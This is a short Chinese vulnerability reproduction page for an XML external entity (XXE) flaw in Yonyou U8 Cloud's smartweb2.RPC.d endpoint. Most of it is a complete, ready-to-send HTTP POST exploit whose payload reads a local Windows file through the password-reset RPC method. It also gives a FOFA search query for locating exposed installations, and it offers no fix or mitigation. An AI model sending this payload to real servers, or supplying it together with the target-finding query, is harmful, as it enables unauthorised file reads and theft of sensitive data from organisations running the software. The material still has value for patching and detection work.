用友U8 Cloud smartweb2.RPC.d 存在XXE漏洞

用友U8 Cloud漏洞复现

1. Cloud smartweb2.RPC.d 存在XXE漏洞

• 漏洞描述
  用友U8 Cloud smartweb2.RPC.d存在xml外部实体注入漏洞，攻击者可以通过此漏洞读取系统文件，获取敏感信息等。
• fofa语句:
  app="用友-U8-Cloud"
• 漏洞:

  POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
  Host: 
  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
  Accept-Encoding: gzip, deflate
  Accept-Language: zh-CN,zh;q=0.9
  Connection: close
  Content-Type: application/x-www-form-urlencoded
  Content-Length: 258
  
  __viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>